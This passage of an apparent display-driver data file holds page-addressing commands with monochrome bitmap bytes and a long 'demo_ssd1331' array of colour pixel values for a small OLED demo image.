{'command': [179, 2, 16]}, {'data': [255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 224, 31, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 14, 112, 128, 112, 14, 1, 0, 0, 0, 0, 0, 0, 0, 0, 30, 112, 62, 112, 30, 2, 56, 124, 68, 124, 56, 0, 68, 124, 120, 76, 4, 12, 65, 65, 127, 127, 64, 64, 56, 124, 69, 127, 127, 64, 0, 94, 94, 0, 0, 0, 0, 255]},
{'command': [180, 2, 16]}, {'data': [255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 248, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 112, 14, 1, 14, 112, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [181, 2, 16]}, {'data': [255, 0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 128, 126, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 0, 0, 3, 28, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [182, 2, 16]}, {'data': [255, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 224, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [183, 2, 16]}, {'data': [255, 128, 128, 128, 128, 128, 128, 131, 140, 136, 144, 144, 176, 144, 144, 136, 140, 131, 128, 128, 128, 128, 128, 128, 191, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 191, 128, 184, 167, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 167, 184, 128, 176, 142, 129, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 129, 142, 176, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 255]}
]
demo_ssd1331 = [
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 248, 0, 248, 0, 248, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 31, 0, 31, 0,
31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31,
0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7, 255, 7, 255, 255,
255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7, 255, 255, 255,
255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 7, 255, 7, 255, 7, 255, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7, 255,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7,
255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255,
7, 255, 7, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
